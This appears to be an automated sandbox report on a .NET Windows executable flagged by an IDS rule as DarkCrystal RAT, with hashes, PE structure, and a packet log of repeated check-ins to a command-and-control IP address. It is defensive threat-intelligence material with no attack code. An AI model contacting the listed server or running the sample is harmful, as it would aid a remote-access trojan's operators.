                                                SHA1:E1117E8118B19001664288AB0C32E32CD0FB6C6D
                                                SHA-256:24B06C18C14E5F86DAB472772B3903A77CBE9549B3F4C4AAED1E86B509A1D44B
                                                SHA-512:617AE584FB3CA7D1BD5035C80B003F4A3BD2520CA12A1A3031F136D17DE418ECEC754BCC054B23EC19CABACEE6D8B5EEA79244B724C6BCE7F14C646FB2088548
                                                Malicious:false
                                                Preview:..Pinging 468325 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):4.648835098499072
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                File name:A5EbyKyjhV.exe
                                                File size:2'551'808 bytes
                                                MD5:48b90c11912e9c7147d86c55d1e2cc94
                                                SHA1:ffc71fb727607913aa176c85f75972f1ac6fda7c
                                                SHA256:bb0f507a87420a0597cdc40917ea1ba9c9576d3e750db3f9b66802b19550c9e7
                                                SHA512:175b7358de82827ca29ecef204fa2451ba44e3e3fc373f65bc40d2d888d43a5d0bc778a78f714e47369b8d9a5b37faa4106e912bb53b13791714d1c7773431f8
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                TLSH:14C57D343DEB502AB173EFB58AE4789ADA6FF6B33707585E205103864713A81DDC163A
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......&...........'.. ... '...@.. .......................`'.......'...@................................

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x67078e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2707340x57.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2720000x370.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2740000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x26e7940x26e800c514593763f9a6c6239b743976e92074unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x2720000x3700x400acbaaf3fe5719356ba5e37a0f370d73aFalse0.376953125data2.86382809101071IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x2740000xc0x2009f10a8dcd24c6ed02c6d3a629d2f236fFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x2720580x318data0.44823232323232326

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-12-05T16:02:21.596399+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.749724121.127.37.3080TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 5, 2024 16:02:20.103940964 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:20.225809097 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:20.225920916 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:20.243160963 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:20.362935066 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:20.637315035 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:20.756951094 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:21.555372000 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:21.596399069 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:22.026050091 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.026154041 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.026210070 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:22.077785015 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:22.161020041 CET4973180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:22.198081970 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.280711889 CET8049731121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.280798912 CET4973180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:22.281012058 CET4973180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:22.400660038 CET8049731121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.424623013 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:22.513395071 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.544413090 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.565155029 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:22.627818108 CET4973180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:22.748522043 CET8049731121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.748537064 CET8049731121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.748724937 CET8049731121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.893800020 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:22.913639069 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:23.033423901 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:23.269150972 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:23.344397068 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:23.388957977 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:23.389031887 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:23.393239975 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:23.601726055 CET8049731121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:23.643270016 CET4973180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:23.840504885 CET8049731121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:23.876399040 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:23.893256903 CET4973180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:23.924519062 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:23.981468916 CET4973480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:23.982769012 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:23.982873917 CET4973180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:24.101608992 CET8049734121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:24.101703882 CET4973480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:24.101886988 CET4973480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:24.103714943 CET8049724121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:24.103792906 CET4972480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:24.104316950 CET8049731121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:24.104362965 CET4973180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:24.221605062 CET8049734121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:24.455926895 CET4973480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:24.575803995 CET8049734121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:24.575829029 CET8049734121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:24.575861931 CET8049734121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:25.427012920 CET8049734121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:25.471379042 CET4973480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:25.838675976 CET8049734121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:25.840137005 CET4973480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:25.960848093 CET8049734121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:25.960951090 CET4973480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:25.973733902 CET4974080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:26.093482018 CET8049740121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:26.093575954 CET4974080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:26.093826056 CET4974080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:26.213862896 CET8049740121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:26.440274954 CET4974080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:26.560131073 CET8049740121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:26.560173988 CET8049740121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:26.560360909 CET8049740121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:27.412092924 CET8049740121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:27.455849886 CET4974080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:27.648539066 CET8049740121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:27.694808006 CET4974080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:27.835719109 CET4974080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:27.836124897 CET4974680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:27.959300995 CET8049740121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:27.959369898 CET8049746121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:27.959383965 CET4974080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:27.959450960 CET4974680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:27.959677935 CET4974680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:28.079441071 CET8049746121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:28.315253973 CET4974680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:28.435040951 CET8049746121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:28.435065031 CET8049746121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:28.435103893 CET8049746121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:28.879378080 CET4975280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:28.896174908 CET4974680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:28.999239922 CET8049752121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:28.999319077 CET4975280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:28.999576092 CET4975280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:29.016779900 CET8049746121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:29.016868114 CET4974680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:29.018676996 CET4975380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:29.119385004 CET8049752121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:29.138989925 CET8049753121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:29.139077902 CET4975380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:29.139359951 CET4975380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:29.259150982 CET8049753121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:29.346502066 CET4975280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:29.466932058 CET8049752121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:29.466944933 CET8049752121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:29.487243891 CET4975380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:29.607714891 CET8049753121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:29.607758045 CET8049753121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:29.607848883 CET8049753121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:30.325002909 CET8049752121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:30.377639055 CET4975280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:30.465775967 CET8049753121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:30.518315077 CET4975380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:30.561918020 CET8049752121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:30.612035990 CET4975280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:30.700455904 CET8049753121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:30.752651930 CET4975380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:30.829188108 CET4975280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:30.829204082 CET4975380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:30.829482079 CET4975980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:30.949306965 CET8049759121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:30.949409008 CET4975980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:30.950176001 CET8049752121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:30.950192928 CET8049753121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:30.950249910 CET4975280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:30.950263023 CET4975380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:30.951083899 CET4975980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:31.070811033 CET8049759121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:31.299603939 CET4975980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:31.420824051 CET8049759121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:31.420838118 CET8049759121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:31.420970917 CET8049759121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:32.275085926 CET8049759121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:32.315220118 CET4975980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:32.513256073 CET8049759121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:32.565196037 CET4975980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:32.640072107 CET4976080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:32.759962082 CET8049760121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:32.760162115 CET4976080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:32.760554075 CET4976080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:32.880239010 CET8049760121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:33.112164974 CET4976080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:33.232079029 CET8049760121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:33.232106924 CET8049760121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:33.232188940 CET8049760121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:34.085803032 CET8049760121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:34.127670050 CET4976080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:34.320471048 CET8049760121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:34.363086939 CET4976080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:34.439160109 CET4976080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:34.439395905 CET4976680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:34.559191942 CET8049766121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:34.559288979 CET4976680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:34.559462070 CET8049760121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:34.559473038 CET4976680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:34.559525967 CET4976080192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:34.679965973 CET8049766121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:34.909106016 CET4976680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:35.028836966 CET8049766121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:35.028866053 CET8049766121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:35.028877974 CET8049766121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:35.566102982 CET4976680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:35.566174984 CET4977280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:35.685858011 CET8049772121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:35.685992002 CET4977280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:35.686146021 CET4977280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:35.686302900 CET8049766121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:35.686362028 CET4976680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:35.688591003 CET4977380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:35.805820942 CET8049772121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:35.808401108 CET8049773121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:35.808525085 CET4977380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:35.808840036 CET4977380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:35.928617954 CET8049773121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:36.034172058 CET4977280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:36.154103994 CET8049772121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:36.154119015 CET8049772121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:36.159135103 CET4977380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:36.279520988 CET8049773121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:36.279531956 CET8049773121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:36.279623032 CET8049773121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:37.014811993 CET8049772121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:37.065191031 CET4977280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.134546995 CET8049773121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:37.174549103 CET4977380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.248414993 CET8049772121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:37.299536943 CET4977280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.301426888 CET8049759121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:37.301477909 CET4975980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.368572950 CET8049773121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:37.408934116 CET4977380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.484574080 CET4977280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.484587908 CET4977380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.484920025 CET4977980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.604672909 CET8049779121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:37.604698896 CET8049772121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:37.604778051 CET4977980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.604785919 CET4977280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.605022907 CET4977980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.605417967 CET8049773121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:37.605493069 CET4977380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:37.725490093 CET8049779121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:37.955979109 CET4977980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:38.075850964 CET8049779121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:38.075895071 CET8049779121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:38.076013088 CET8049779121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:38.925029039 CET8049779121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:38.971421003 CET4977980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:39.160757065 CET8049779121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:39.205816984 CET4977980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:39.285221100 CET4978180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:39.405023098 CET8049781121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:39.405126095 CET4978180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:39.405297995 CET4978180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:39.525084019 CET8049781121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:39.752846956 CET4978180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:39.872948885 CET8049781121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:39.906482935 CET8049781121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:39.906497955 CET8049781121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:40.728463888 CET8049781121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:40.783972025 CET4978180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:40.964612007 CET8049781121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:41.018316031 CET4978180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:41.077568054 CET4978180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:41.077784061 CET4978680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:41.197606087 CET8049786121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:41.197690010 CET4978680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:41.197727919 CET8049781121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:41.197783947 CET4978180192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:41.197993994 CET4978680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:41.317621946 CET8049786121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:41.549642086 CET4978680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:41.669595003 CET8049786121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:41.669637918 CET8049786121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:41.669688940 CET8049786121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:42.253443956 CET4978680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:42.253473043 CET4979280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:42.373261929 CET8049792121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:42.373368979 CET4979280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:42.373779058 CET8049786121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:42.373827934 CET4978680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:42.374336004 CET4979280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:42.376650095 CET4979380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:42.494137049 CET8049792121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:42.496504068 CET8049793121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:42.496625900 CET4979380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:42.496829987 CET4979380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:42.616574049 CET8049793121.127.37.30192.168.2.7
